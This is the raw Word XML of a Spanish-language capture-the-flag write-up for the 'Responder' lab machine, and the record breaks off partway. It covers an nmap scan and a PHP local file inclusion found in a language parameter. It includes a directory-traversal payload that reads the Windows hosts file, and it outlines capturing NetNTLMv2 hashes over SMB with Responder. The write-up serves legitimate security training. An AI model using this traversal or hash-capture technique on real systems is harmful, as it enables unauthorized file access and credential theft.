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AA60B" w14:textId="582DFFF7" w:rsidR="006D5440" w:rsidRPr="0074381C" w:rsidRDefault="00346288" w:rsidP="0074381C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve">ANALISIS </w:t>
      </w:r>
      <w:r w:rsidR="00101922" w:rsidRPr="0074381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve">MAQUINA VIRTUAL </w:t>
      </w:r>
      <w:r w:rsidR="00F8410B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>RESPONDER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667932D9" w14:textId="77777777" w:rsidR="0074381C" w:rsidRDefault="0074381C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77B3EDCB" w14:textId="4EE29BA0" w:rsidR="008277E8" w:rsidRPr="00121D7D" w:rsidRDefault="008277E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Dificultad:</w:t>
      </w:r>
      <w:r w:rsidRPr="00121D7D">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Facil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4AB487" w14:textId="3D481B46" w:rsidR="008277E8" w:rsidRPr="00121D7D" w:rsidRDefault="008277E8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Etiqueta:</w:t>
      </w:r>
      <w:r w:rsidRPr="00121D7D">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F8410B">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Samba, Enumeracion, Apache, WinRM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467BED91" w14:textId="3DB3AB25" w:rsidR="00101922" w:rsidRPr="0074381C" w:rsidRDefault="00101922">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0074381C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>IP Maquina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B99092" w14:textId="54DD493A" w:rsidR="00101922" w:rsidRPr="00121D7D" w:rsidRDefault="002249F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="484F0784" wp14:editId="185617DC">
            <wp:extent cx="4641011" cy="133433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517" cy="1339076"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A66A59" w14:textId="026E099C" w:rsidR="00101922" w:rsidRPr="00121D7D" w:rsidRDefault="00101922">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121D7D">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Realizamos ping para ver si tenemos conexión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB10E76" w14:textId="250FDD11" w:rsidR="00101922" w:rsidRPr="00F8410B" w:rsidRDefault="002249F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA08A86" wp14:editId="3DA32BEB">
            <wp:extent cx="4640580" cy="1463899"/>
            <wp:effectExtent l="0" t="0" r="7620"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7070" cy="1465946"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AEC77E" w14:textId="63DC5E7B" w:rsidR="00FB5570" w:rsidRPr="00121D7D" w:rsidRDefault="00FB5570" w:rsidP="00FB5570">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00121D7D">
        <w:rPr>
          <w:lang w:val="es-HN"/>
        </w:rPr>
        <w:t>Escaneamos para ver los puertos y servicios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3956672F" w14:textId="5D93E7B8" w:rsidR="007007B0" w:rsidRDefault="008166EE" w:rsidP="007007B0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B91600E" wp14:editId="24EF77CD">
            <wp:extent cx="4917056" cy="146877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9270" cy="1472422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2D5FC7" w14:textId="03829F14" w:rsidR="008166EE" w:rsidRDefault="008166EE" w:rsidP="008166EE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Al no encontrar puertos incluiremos el comando -p- para que liste todos los puertos</w:t>
      </w:r>
      <w:r w:rsidR="004564A2">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>, además usaremos el comando –min-rate que nos permitirá colocar la cantidad de paquetes que queremos que se envíen esto con el objetivo de acelerar el escaneo</w:t>
      </w:r>
      <w:r w:rsidR="00B22440">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> y colocando -v para ver mas informacion</w:t>
      </w:r>
      <w:r w:rsidR="004564A2">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B307486" w14:textId="02F4F1ED" w:rsidR="004564A2" w:rsidRDefault="004564A2" w:rsidP="008166EE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Quedando el comando del escaneo de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48866097" w14:textId="263D9B6B" w:rsidR="004564A2" w:rsidRDefault="00B22440" w:rsidP="008166EE">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B22440">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nmap -v -p- --min-rate 5000 -sV -sC 10.129.136.91</w:t>
      </w:r>
      <w:r w:rsidRPr="00B22440">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:cr/>
      </w:r>
      <w:r w:rsidR="00D40B97">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7437AFE0" wp14:editId="76010A76">
            <wp:extent cx="5029200" cy="269271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3999" cy="2695279"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24800F8B" w14:textId="73E0E70D" w:rsidR="00D40B97" w:rsidRDefault="00D40B97" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52735E0E" wp14:editId="6F1DD5D9">
            <wp:extent cx="5029200" cy="180386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1900" cy="1812008"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="160CD516" w14:textId="6905B145" w:rsidR="00D40B97" w:rsidRDefault="00D40B97" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Encontramos puertos abiertos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BBC48B" w14:textId="4EFC44B9" w:rsidR="00D40B97" w:rsidRDefault="00D40B97" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Puerto 80 Apache httpd 2.4.52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE55DC0" w14:textId="4994B58D" w:rsidR="00D40B97" w:rsidRPr="00D40B97" w:rsidRDefault="00D40B97" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40B97">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Puerto 5040 Servicio desconocido </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B31FB40" w14:textId="6B088016" w:rsidR="00D40B97" w:rsidRDefault="00D40B97" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40B97">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Puerto 5985 pando-sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A59FDD6" w14:textId="5330E2BA" w:rsidR="00E86ECF" w:rsidRDefault="00E86ECF" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657216" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1362EB33" wp14:editId="07244213">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>86369</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4054415" cy="1673972"/>
            <wp:effectExtent l="0" t="0" r="3810" b="254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54415" cy="1673972"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAC8B74" w14:textId="184D1685" w:rsidR="00D40B97" w:rsidRDefault="00D40B97" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Como tenemos el puerto 80 lo mas seguro haya una pagina web montada en apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B61C042" w14:textId="72A586CA" w:rsidR="00D40B97" w:rsidRDefault="00D40B97" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0DA077" w14:textId="77777777" w:rsidR="00D40B97" w:rsidRPr="00D40B97" w:rsidRDefault="00D40B97" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76198FB9" w14:textId="77777777" w:rsidR="00D40B97" w:rsidRPr="00D40B97" w:rsidRDefault="00D40B97" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9D6E58" w14:textId="77777777" w:rsidR="00D40B97" w:rsidRPr="00D40B97" w:rsidRDefault="00D40B97" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378C52B7" w14:textId="6DCEA532" w:rsidR="00D40B97" w:rsidRDefault="00415955" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">No hay conexión pero la dirección URL nos da el dominio </w:t>
      </w:r>
      <w:r w:rsidRPr="00415955">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>http://unika.htb/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="704D8018" wp14:editId="76E0F7DD">
            <wp:extent cx="5612130" cy="23171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317115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D40B97">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA4701E" w14:textId="7E78A0CD" w:rsidR="00415955" w:rsidRDefault="00415955" w:rsidP="00D40B97">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Intentaremos colocar el nombre de dominio apuntando en la dirección ip en el archivo /ect/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BDDFCA" w14:textId="352582BF" w:rsidR="00415955" w:rsidRDefault="00415955" w:rsidP="00415955">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00415955">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>El archivo /etc/hosts se usa para convertir un nombre de host en una dirección IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> y asi se</w:t>
      </w:r>
      <w:r w:rsidRPr="00415955">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> resuelva la dirección para unika.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B15B70B" w14:textId="292D8486" w:rsidR="00415955" w:rsidRDefault="00415955" w:rsidP="00415955">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39B17CBD" wp14:editId="4FE7E68D">
            <wp:extent cx="5612130" cy="11214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121410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5241C4C5" w14:textId="66514962" w:rsidR="001A6A3B" w:rsidRDefault="001A6A3B" w:rsidP="001A6A3B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A5B005" wp14:editId="3809AD7C">
            <wp:extent cx="5612130" cy="2567305"/>
            <wp:effectExtent l="0" t="0" r="762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67305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57791E8D" w14:textId="6CB7D261" w:rsidR="001A6A3B" w:rsidRDefault="001A6A3B" w:rsidP="001A6A3B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Y asi resolvimos para poder ver la pagina web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16526846" w14:textId="31CA08F2" w:rsidR="001A6A3B" w:rsidRDefault="001A6A3B" w:rsidP="001A6A3B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Analizamos la pagina con </w:t>
      </w:r>
      <w:r w:rsidR="0051681D">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>burpsuite y los directorios que se escanearon no veíamos nada sospechoso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9632AA" w14:textId="2EC5FBDD" w:rsidR="001A6A3B" w:rsidRDefault="0051681D" w:rsidP="001A6A3B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C23FA5E" wp14:editId="3B48E01C">
            <wp:extent cx="2590476" cy="1533333"/>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476" cy="1533333"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0139EB6C" w14:textId="7E44E95E" w:rsidR="0051681D" w:rsidRDefault="0051681D" w:rsidP="0051681D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Para sacar mas información habría que enlazar dirbuster y burpsuite para encotrar directorios o archivos ocultos, pero no lo vamos hacer ya que revizando manualmente la pagina encontramos que la pagina cambia de idioma y en la URL cambia</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B9AB3E" w14:textId="311A3272" w:rsidR="0051681D" w:rsidRDefault="0051681D" w:rsidP="0051681D">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="779070D5" wp14:editId="0AE5E8A2">
            <wp:extent cx="5612130" cy="12077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207770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="550DFD9B" w14:textId="42BB7A38" w:rsidR="0051681D" w:rsidRDefault="0051681D" w:rsidP="0051681D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051681D">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve">Al observar la URL, podemos ver que el parámetro de la página está cargando la página </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>german</w:t>
      </w:r>
      <w:r w:rsidRPr="0051681D">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>.html , lo que puede ser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0051681D">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>potencialmente vulnerable a una vulnerabilidad de Inclusión de archivo local (LFI) si la entrada de la página no se desinfecta.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> Para ello realizaremos unas pruebas. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4C99B3" w14:textId="6565C784" w:rsidR="0051681D" w:rsidRDefault="0051681D" w:rsidP="0051681D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0051681D">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Uno de los archivos más comunes a los que un probador de penetración podría intentar acceder en una máquina con Windows para verificar LFI es el archivo de hosts,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0051681D">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>WINDOWS\System32\drivers\etc\hosts (este archivo ayuda en la traducción local de nombres de host a direcciones IP) . La cadena ../ se usa para recorrer un directorio, uno a la vez. Por lo tanto, se incluyen varias cadenas ../ en la URL para que el controlador de archivos en el servidor vuelva al directorio base, es decir, C:\ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA40C57" w14:textId="64E6271C" w:rsidR="00E836F0" w:rsidRDefault="00E836F0" w:rsidP="00E836F0">
      <w:r>
        <w:t>../../../../../../../../windows/system32/drivers/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7754FB" w14:textId="00D3D69C" w:rsidR="00E836F0" w:rsidRDefault="00E836F0" w:rsidP="00E836F0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65BA56F6" wp14:editId="45163AA0">
            <wp:extent cx="5612130" cy="982345"/>
            <wp:effectExtent l="0" t="0" r="762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982345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DCC0EA" w14:textId="611A917F" w:rsidR="00E836F0" w:rsidRDefault="00E836F0" w:rsidP="00E836F0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E836F0">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>La inclusión del archivo, en este caso, fue posible porque en el backend se usa el método include() de PHP para procesar la página de parámetros de URL para servir una página web diferente para diferentes idiomas. Y debido a que no se realiza una desinfección adecuada en este parámetro de página , pudimos pasar entradas maliciosas y, por lo tanto, ver los archivos internos del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD939E" w14:textId="77777777" w:rsidR="008D4BD5" w:rsidRDefault="008D4BD5" w:rsidP="008D4BD5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="534CAE5F" w14:textId="43B12246" w:rsidR="008D4BD5" w:rsidRDefault="008D4BD5" w:rsidP="008D4BD5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4BD5">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Sabemos que esta página web es vulnerable a la vulnerabilidad de inclusión de archivos y se sirve en una máquina con Windows. Por lo tanto, existe la posibilidad de incluir un archivo en la estación de trabajo de nuestro atacante. Si seleccionamos un protocolo como SMB, Windows intentará autenticarse en nuestra máquina y podremos capturar el NetNTLMv2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7C9DA2" w14:textId="5FDBD7EE" w:rsidR="008D4BD5" w:rsidRDefault="008D4BD5" w:rsidP="008D4BD5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4BD5">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Para empezar, clonamos el repositorio de Responder en nuestra máquina local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF7AAFE" w14:textId="3FE2D954" w:rsidR="008D4BD5" w:rsidRDefault="008D4BD5" w:rsidP="008D4BD5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CB845A7" wp14:editId="18076D7E">
            <wp:extent cx="5612130" cy="145415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54150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C11F217" w14:textId="53A7329D" w:rsidR="008D4BD5" w:rsidRDefault="008D4BD5" w:rsidP="008D4BD5">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="184363D9" wp14:editId="72C08C86">
            <wp:extent cx="5612130" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="762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542925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="504D8DDF" w14:textId="0876B174" w:rsidR="008D4BD5" w:rsidRDefault="008D4BD5" w:rsidP="008D4BD5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D4BD5">
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
        <w:t>Verifique que Responder.conf esté configurado para escuchar solicitudes SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8251AF" w14:textId="4506056F" w:rsidR="00B313AD" w:rsidRDefault="00B313AD" w:rsidP="008D4BD5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-419"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
